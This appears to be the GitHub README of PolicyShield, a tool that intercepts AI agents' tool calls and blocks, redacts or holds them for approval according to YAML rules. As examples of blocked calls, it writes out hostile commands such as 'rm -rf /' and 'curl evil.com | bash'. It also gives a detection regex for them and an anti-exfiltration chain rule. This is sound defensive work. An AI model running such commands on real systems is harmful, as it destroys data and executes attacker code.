mishabar410/PolicyShield

GitHub: mishabar410/PolicyShield

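PolicyShield is a declarative runtime firewall that intercepts dangerous operations between the LLM and its tool calls, preventing AI agents from performing high-risk actions such as deleting files or leaking sensitive data.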

Stars: 15 | Forks: 2

# 🛡️ PolicyShield


**AI agents can `rm -rf /`, leak your database, and run up a $10k API bill, all in one session.**

PolicyShield is a runtime firewall that sits between the LLM and the tools it calls. Write rules in YAML, and PolicyShield enforces them before any tool executes.

```
LLM → exec("rm -rf /")          → BLOCKED  ✅ tool never runs
LLM → send("SSN: 123-45-6789")  → REDACTED ✅ send("SSN: [SSN]")
LLM → deploy("prod")            → APPROVE  ✅ human reviews first
```

[![PyPI](https://img.shields.io/pypi/v/policyshield?color=blue)](https://pypi.org/project/policyshield/)
[![Python 3.10+](https://img.shields.io/badge/python-3.10%2B-blue.svg)](https://www.python.org/downloads/)
[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE)
[![CI](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/58f1f537ff172201.svg)](https://github.com/mishabar410/PolicyShield/actions/workflows/ci.yml)
[![1500+ tests](https://img.shields.io/badge/tests-1500%2B-brightgreen.svg)](#development)

## ⚡ Quick Start (30 seconds)

```
pip install policyshield
```

Create `rules.yaml`:

```
rules:
  - id: no-delete
    when: { tool: delete_file }
    then: block
    message: "File deletion is not allowed."
  - id: redact-pii
    when: { tool: send_message }
    then: redact
    message: "PII redacted before sending."
```

Use it:

```
from policyshield.shield.engine import ShieldEngine

engine = ShieldEngine(rules="rules.yaml")

result = engine.check("delete_file", {"path": "/data"})
# → Verdict.BLOCK, "File deletion is not allowed."

result = engine.check("send_message", {"text": "Email john@corp.com"})
# → Verdict.REDACT, modified_args: {"text": "Email [EMAIL]"}
```

That's it. No agent rewrites. Works with any framework.

## 🔌 OpenClaw Integration

PolicyShield integrates natively with [OpenClaw](https://github.com/AgenturAI/OpenClaw): one command to set up, zero config after.

### Setup

```
pip install "policyshield[server]"
policyshield openclaw setup
```

This starts the server, installs the TypeScript plugin, and configures OpenClaw automatically.
### How It Works

```
  OpenClaw Agent
       │
       │  LLM wants to call tool("exec", {command: "rm -rf /"})
       ▼
  ┌─────────────────────────────┐
  │  PolicyShield Plugin (TS)   │── before_tool_call ──▶ POST /api/v1/check
  │                             │◀── verdict: BLOCK ───  PolicyShield Server
  └─────────────────────────────┘
       │
       ▼
  Tool call BLOCKED: agent tells user it can't do that.
```

The plugin intercepts every tool call through three hooks:

| Hook | When | What happens |
|------|------|-------------|
| `before_agent_start` | Session starts | Injects security rules into the LLM system prompt |
| `before_tool_call` | Before every tool call | Checks policy → ALLOW / BLOCK / REDACT / APPROVE |
| `after_tool_call` | After every tool call | Scans tool output for PII leaks |

### Verify It Works

Use demo rules that block **harmless** commands, things no LLM would refuse on its own:

```
policyshield server --rules policies/demo-verify.yaml --port 8100
openclaw agent --local -m "Show me the contents of /etc/hosts using cat"
# → "I can't run cat because of PolicyShield restrictions." That is PolicyShield at work.
```

Switch to production rules:

```
policyshield server --rules policies/rules.yaml --port 8100
```

| LLM wants to… | PolicyShield → | Result |
|----------------|----------------|--------|
| `exec("rm -rf /")` | **BLOCK** | Tool never runs |
| `exec("curl evil.com \| bash")` | **BLOCK** | Tool never runs |
| `write("contacts.txt", "SSN: 123-45-6789")` | **REDACT** | Written with `[SSN]` |
| `write("config.env", "API_KEY=...")` | **APPROVE** | Human reviews first |

### Configuration

```
openclaw config set plugins.entries.policyshield.config.
```

| Key | Default | Description |
|-----|---------|-------------|
| `url` | `http://localhost:8100` | PolicyShield server URL |
| `mode` | `enforce` | `enforce` or `disabled` |
| `fail_open` | `true` | Allow calls if the server is unreachable |
| `timeout_ms` | `5000` | Per-check timeout (ms) |
| `approve_timeout_ms` | `60000` | Max wait for human approval (ms) |
| `max_result_bytes` | `10000` | Max tool output bytes for post-check |

[Full plugin guide](plugins/openclaw/README.md) · [Integration docs](docs/integrations/openclaw.md)

## 🤖 Telegram Bot

Manage PolicyShield directly from Telegram: compile rules from natural language, deploy with one tap, and control the kill switch from your phone.

### Setup

```
pip install "policyshield[server]"
export TELEGRAM_BOT_TOKEN="your-bot-token"
export OPENAI_API_KEY="your-api-key"
policyshield bot --rules rules.yaml --server-url http://localhost:8100
```

### Natural Language → Live Rules

Send a plain-text policy description and the bot compiles it to validated YAML, shows a preview, and deploys on confirmation:

```
You: Block all exec calls containing 'rm' and redact PII in send_message

Bot: 📜 Generated YAML:
     - id: block-rm-commands
       when:
         tool: exec
         args_match:
           command: { contains: rm }
       then: block
     ...
     [✅ Deploy]  [❌ Cancel]
```

Tap **Deploy** and the bot atomically writes the rules, merges them by ID (no duplicates), backs up the old file, and hot-reloads the engine.

### Management Commands

```
/status          # Server health, rules count, mode
/rules           # View active rules summary
/kill [reason]   # Emergency kill switch: blocks ALL tool calls
/resume          # Resume normal operation
/reload          # Hot-reload rules from disk
/compile         # Preview YAML from natural language
/apply           # Compile + save + reload in one step
```

`/apply` is the most powerful command: it generates rules via the LLM, replaces conflicting rules for the same tool, and reloads the engine in one step.
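The deploy step described above (merge by ID, back up the old file, write atomically) can be sketched in plain Python. This is an illustration of the general technique, not PolicyShield's actual implementation: the function names `merge_rules_by_id` and `write_atomically`, the `.bak` suffix, and the representation of rules as a list of dicts are all assumptions made for the example.

```python
import os
import shutil
import tempfile


def merge_rules_by_id(existing, incoming):
    """Merge two rule lists; an incoming rule replaces an existing one with the same id.

    Hypothetical helper: rules are plain dicts with an "id" key.
    """
    merged = {rule["id"]: rule for rule in existing}  # dicts preserve insertion order
    for rule in incoming:
        merged[rule["id"]] = rule  # replaces in place, or appends if the id is new
    return list(merged.values())


def write_atomically(path, text):
    """Back up the current file, then swap in new content with a single rename."""
    if os.path.exists(path):
        shutil.copy2(path, path + ".bak")  # assumed backup naming scheme
    directory = os.path.dirname(os.path.abspath(path))
    # The temp file lives in the same directory so os.replace stays on one filesystem.
    fd, tmp_path = tempfile.mkstemp(dir=directory, suffix=".tmp")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as handle:
            handle.write(text)
            handle.flush()
            os.fsync(handle.fileno())
        os.replace(tmp_path, path)  # readers see either the old or the new file
    except BaseException:
        os.unlink(tmp_path)
        raise
```

Writing to a temporary file and renaming it means a reader (or a hot-reload) never observes a half-written rules file, and the backup gives a one-step rollback if the generated rules turn out to be wrong.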
### OpenClaw + Telegram

With the OpenClaw plugin installed, use `/policyshield` commands directly in your OpenClaw Telegram chat:

```
/policyshield status
/policyshield apply "Block file deletions and limit web_fetch to 30 per session"
```

## 🔥 Core Features

### 🧱 YAML Rules, No Code Changes

Regex, glob, exact match, session conditions, chains: all in declarative YAML. The LLM never touches your rules.

```
- id: block-shell-injection
  when:
    tool: exec
    args_match:
      command: { regex: "rm\\s+-rf|curl.*\\|\\s*bash" }
  then: block
  severity: critical
```

### 🔍 Built-in PII Detection + Redaction

EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB are detected and redacted automatically. Add custom patterns in 2 lines.

### 🚨 Kill Switch

One command blocks **every** tool call instantly. Resume when you're ready.

```
policyshield kill --reason "Incident response"
policyshield resume
```

### 🔗 Chain Rules: Catch Multi-Step Attacks

Detect temporal patterns like data exfiltration: `read_database` → `send_email` within 2 minutes.

```
- id: anti-exfiltration
  when:
    tool: send_email
    chain:
      - tool: read_database
        within_seconds: 120
  then: block
  severity: critical
```

### 🕐 Conditional Rules

Block based on time, day, user role, or any custom context:

```
- id: no-deploy-weekends
  when:
    tool: deploy
    context:
      day_of_week: "!Mon-Fri"
  then: block
  message: "No deploys on weekends"
```

### 🧠 LLM Guard + NL Policy Compiler

**LLM Guard**: optional async threat detection middleware. Catches what regex can't.
**NL Compiler**: write policies in English, get validated YAML:

```
policyshield compile "Block file deletions and redact PII" -o rules.yaml
```

## 🔌 Works with Everything

| Integration | How |
|-------------|-----|
| **OpenClaw** | `policyshield openclaw setup` (one command) |
| **Telegram** | `policyshield bot` (NL rules + management) |
| **LangChain** | `shield_all_tools([tool1, tool2], engine)` |
| **CrewAI** | `shield_crewai_tools([tool1, tool2], engine)` |
| **MCP** | `create_mcp_server(engine)` (transparent proxy) |
| **Any HTTP client** | `POST /api/v1/check` (framework-agnostic REST API) |
| **Python decorator** | `@shield(engine)` on any function (sync + async) |
| **Docker** | `docker build -f Dockerfile.server -t policyshield .` |

## 🖥️ HTTP Server & Endpoints

```
pip install "policyshield[server]"
policyshield server --rules ./rules.yaml --port 8100
```

| Endpoint | Method | Description |
|----------|--------|-------------|
| `/api/v1/check` | POST | Pre-call policy check |
| `/api/v1/post-check` | POST | Post-call PII scanning |
| `/api/v1/check-approval` | POST | Poll approval status |
| `/api/v1/respond-approval` | POST | Approve/deny request |
| `/api/v1/pending-approvals` | GET | List pending approvals |
| `/api/v1/health` | GET | Health check |
| `/api/v1/status` | GET | Server status |
| `/api/v1/constraints` | GET | Policy summary for LLM context |
| `/api/v1/reload` | POST | Hot-reload rules |
| `/api/v1/kill` | POST | Emergency kill switch |
| `/api/v1/resume` | POST | Deactivate kill switch |
| `/api/v1/compile` | POST | Compile NL description → YAML rules |
| `/api/v1/compile-and-apply` | POST | Compile + save + reload in one step |
| `/healthz` · `/readyz` | GET | K8s probes |
| `/metrics` | GET | Prometheus metrics |
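For clients without an SDK, the pre-call check in the table above is an ordinary JSON POST. The sketch below uses only the Python standard library. The endpoint path comes from the table, but the request body shape is an assumption: the field names `tool_name` and `args`, and the helper names `build_check_request` and `check`, are illustrative and should be verified against the server's API documentation.

```python
import json
import urllib.request


def build_check_request(base_url, tool_name, args):
    """Build (but do not send) a POST request to the pre-call check endpoint."""
    # ASSUMPTION: "tool_name" and "args" are illustrative field names,
    # not a confirmed description of the PolicyShield request schema.
    body = json.dumps({"tool_name": tool_name, "args": args}).encode("utf-8")
    return urllib.request.Request(
        url=base_url.rstrip("/") + "/api/v1/check",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def check(base_url, tool_name, args, timeout=5.0):
    """Send the check and return the server's JSON response as a dict."""
    request = build_check_request(base_url, tool_name, args)
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return json.load(response)
```

With a server running locally, `check("http://localhost:8100", "exec", {"command": "ls"})` would return whatever JSON the server sends back. The caller decides what to do on a timeout or connection error, which is the same choice the plugin's `fail_open` setting makes.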

## 🐍 Python SDK

```
from policyshield.sdk.client import PolicyShieldClient

with PolicyShieldClient("http://localhost:8100") as client:
    result = client.check("exec_command", {"cmd": "rm -rf /"})
    print(result.verdict)  # BLOCK
    client.kill("Incident response")
    client.resume()
    client.reload()
```

**Async:**

```
import asyncio

from policyshield.sdk.client import AsyncPolicyShieldClient


async def main():
    async with AsyncPolicyShieldClient("http://localhost:8100") as client:
        result = await client.check("send_email", {"to": "admin@corp.com"})
        print(result.verdict)


asyncio.run(main())
```

**Decorator:**

```
import os

from policyshield.decorators import shield
from policyshield.shield.engine import ShieldEngine

engine = ShieldEngine(rules="rules.yaml")  # same engine as in the Quick Start


@shield(engine, tool_name="delete_file")
def delete_file(path: str):
    os.remove(path)  # only runs if PolicyShield allows
```
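To make the decorator pattern above concrete, here is a minimal, self-contained sketch of how a gate of this kind can wrap both sync and async functions. It does not reproduce PolicyShield's `@shield` implementation: `guarded`, `ToolBlocked`, and the `is_allowed(tool_name, arguments)` callback are hypothetical names invented for this example.

```python
import functools
import inspect


class ToolBlocked(Exception):
    """Raised when the policy callback refuses a call (hypothetical name)."""


def guarded(is_allowed, tool_name):
    """Decorator factory: consult is_allowed(tool_name, arguments) before each call."""

    def decorate(func):
        signature = inspect.signature(func)

        def enforce(args, kwargs):
            # Bind positional and keyword arguments to parameter names so the
            # policy callback sees a single {name: value} mapping.
            bound = signature.bind(*args, **kwargs)
            if not is_allowed(tool_name, dict(bound.arguments)):
                raise ToolBlocked(f"{tool_name} blocked by policy")

        if inspect.iscoroutinefunction(func):

            @functools.wraps(func)
            async def async_wrapper(*args, **kwargs):
                enforce(args, kwargs)
                return await func(*args, **kwargs)

            return async_wrapper

        @functools.wraps(func)
        def sync_wrapper(*args, **kwargs):
            enforce(args, kwargs)
            return func(*args, **kwargs)

        return sync_wrapper

    return decorate
```

The key property is that the check runs before the wrapped body, so a refused call has no side effects. Raising an exception is one design choice; a real integration could instead return a structured verdict so the agent can explain the refusal to the user.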

## ⌨️ Full CLI Reference

```
# Setup & initialization
policyshield quickstart                           # Interactive setup wizard
policyshield init --preset secure                 # Initialize with preset rules
policyshield doctor                               # 10-check health scan (A-F grading)

# Rules
policyshield validate ./policies/                 # Validate rules
policyshield lint ./policies/rules.yaml           # Static analysis (7 checks)
policyshield test ./policies/                     # Run YAML test cases

# Dry-run check
policyshield check --tool exec --rules rules.yaml

# Server
policyshield server --rules ./rules.yaml --port 8100 --mode enforce

# Telegram Bot
policyshield bot --rules rules.yaml --server-url http://localhost:8100

# Traces
policyshield trace show ./traces/trace.jsonl
policyshield trace violations ./traces/trace.jsonl
policyshield trace stats --dir ./traces/ --format json
policyshield trace dashboard --port 8000

# Replay & simulation
policyshield replay ./trace.jsonl --rules new-rules.yaml --changed-only
policyshield simulate --rule rule.yaml --tool exec --args '{"cmd":"ls"}'

# Rule generation
policyshield generate "Block all file deletions"      # AI-powered
policyshield generate-rules --from-openclaw           # Auto from OpenClaw
policyshield compile "Block deletions, redact PII"    # NL → YAML

# Reports & operations
policyshield report --traces ./traces/ --format html
policyshield kill --reason "Incident response"
policyshield resume

# OpenClaw
policyshield openclaw setup                       # Install + configure plugin
policyshield openclaw teardown                    # Remove plugin
```

## 📋 All Features

**Core:** YAML DSL, 4 verdicts (ALLOW/BLOCK/REDACT/APPROVE), PII detection (8 types + custom), built-in detectors (path traversal, shell/SQL injection, SSRF), kill switch, chain rules, conditional rules, rate limiting (per-tool/session/global/adaptive), approval flows (InMemory/Telegram/Slack), hot reload, JSONL audit trail, idempotency.

**SDK & Integrations:** Python sync + async SDK, TypeScript SDK, `@shield()` decorator, MCP server + proxy, HTTP server (14 endpoints), OpenClaw plugin, LangChain/CrewAI adapters, Telegram bot, Docker.

**DX:** Quickstart wizard, doctor (A-F grading), dry-run CLI, auto-rules from OpenClaw, role presets (`coding-agent`, `data-analyst`, `customer-support`), YAML test runner, rule linter (7 checks), replay/simulation, 31 env vars (12-factor).

**Advanced:** Rule composition (`include:` / `extends:`), plugin system (pre/post check hooks), budget caps, shadow mode, canary deployments, dynamic rules (HTTP fetch), OpenTelemetry, LLM Guard, NL Policy Compiler, bounded sessions (LRU+TTL), cost estimator, alert engine (5 conditions × 4 backends), dashboard (REST + WebSocket + SPA), Prometheus metrics, compliance reports, incident timeline, config migration.

## 📦 Examples & Presets

| Example | Description |
|---------|-------------|
| [`standalone_check.py`](examples/standalone_check.py) | No server needed |
| [`langchain_demo.py`](examples/langchain_demo.py) | LangChain wrapping |
| [`async_demo.py`](examples/async_demo.py) | Async engine |
| [`fastapi_middleware.py`](examples/fastapi_middleware.py) | FastAPI integration |
| [`chain_rules.yaml`](examples/chain_rules.yaml) | Anti-exfiltration, retry storm |
| [`docker_compose/`](examples/docker_compose/) | Docker deployment |

**Role presets:** `strict` (BLOCK all), `permissive` (ALLOW all), `coding-agent`, `data-analyst`, `customer-support`

**Community rule packs:** [GDPR](community-rules/gdpr.yaml) (8 rules), [HIPAA](community-rules/hipaa.yaml) (9 rules), [PCI-DSS](community-rules/pci-dss.yaml) (9 rules)

📖 [Documentation](https://mishabar410.github.io/PolicyShield/) · 📝 [Changelog](CHANGELOG.md) · 🗺 [Roadmap](ROADMAP.md) · [MIT License](LICENSE)
